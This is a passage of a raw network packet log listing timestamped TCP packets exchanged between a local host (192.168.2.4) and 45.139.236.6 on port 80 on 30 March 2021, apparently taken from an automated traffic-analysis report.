Mar 30, 2021 14:22:48.836838961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.836854935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836893082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836898088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.836934090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.836951017 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.836963892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837013006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837054968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837057114 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837094069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837133884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837136984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837172985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837210894 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837212086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837255001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837294102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837296009 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837344885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837393045 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837414026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837457895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837495089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837534904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837554932 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837573051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837579966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837611914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837644100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837650061 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837696075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837738037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837745905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837789059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837826967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837850094 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837874889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837934017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.837951899 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.837975025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838011026 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838012934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838052034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838099003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838100910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838144064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838180065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838190079 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838224888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838264942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838265896 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838303089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838342905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838356018 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838381052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838399887 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838429928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838473082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838510036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838548899 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838550091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838591099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838625908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838628054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838670969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838680983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838720083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838759899 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838771105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838814020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838851929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838891029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838881016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.838929892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838965893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.838999033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839018106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839036942 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839057922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839090109 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839106083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839148045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839185953 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839186907 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839225054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839257956 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839263916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839302063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839340925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839344978 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839378119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839423895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839427948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839466095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839484930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839504004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839543104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839560986 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839580059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839618921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839657068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839668036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839694023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839725018 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839742899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839786053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839799881 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839823961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839864969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839903116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839915037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839941025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.839975119 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.839981079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840019941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840049982 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840068102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840110064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840147972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840183973 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840187073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840190887 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840226889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840264082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840302944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840337038 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840342045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840390921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840435028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840435028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840472937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840476990 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840514898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840550900 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840553999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840593100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840631962 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840631962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840673923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840722084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840742111 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840768099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840806007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840806961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840846062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840883970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840884924 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840923071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.840960979 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.840984106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841028929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841075897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841092110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841120005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841157913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841171980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841197014 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841234922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841245890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841286898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841324091 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841326952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841367960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841429949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841449976 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841469049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841511011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841523886 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841551065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841594934 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841598988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841643095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841672897 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841682911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841722965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841764927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841794014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841804028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841845036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841850996 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841886044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841926098 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841937065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.841981888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.841983080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842021942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842060089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842098951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842134953 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842138052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842178106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842216015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842221022 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842262983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842271090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842307091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842338085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842344999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842384100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842422009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842422009 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842459917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842494965 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842498064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842536926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842544079 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842585087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842616081 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842628002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842667103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842700005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842705011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842746019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842751980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842783928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842823029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842834949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842860937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842907906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842911959 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842952013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.842964888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.842989922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843022108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843028069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843066931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843100071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843106985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843147039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843178034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843183994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843229055 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843231916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843275070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843311071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843312025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843350887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843389988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843389988 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843429089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843441963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843467951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843506098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843506098 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843553066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843586922 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843595028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843632936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843663931 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843672037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843710899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843724966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843750000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843791008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843802929 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843827009 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843830109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843878031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843913078 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.843919992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843959093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.843971014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.844002962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.844044924 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.844060898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.844101906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.844125032 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.844189882 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.870728016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.933960915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.934200048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935193062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935240030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935287952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935319901 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935334921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935374975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935378075 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935414076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935436010 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935452938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935465097 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935492039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935504913 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935530901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935550928 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935570955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935587883 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935619116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935620070 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935662985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935700893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935722113 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935741901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935782909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935807943 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935821056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935832977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935862064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935888052 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935909986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935931921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935949087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935972929 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.935981035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.935995102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936012030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936022997 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936042070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936053038 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936074018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936080933 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936104059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936129093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936135054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936165094 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936166048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936189890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936203957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936216116 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936237097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936260939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936268091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936295033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936300993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936321974 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936331987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936347961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936362028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936376095 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.936393023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.936407089 CEST	49744	80	192.168.2.4	45.139.236.6
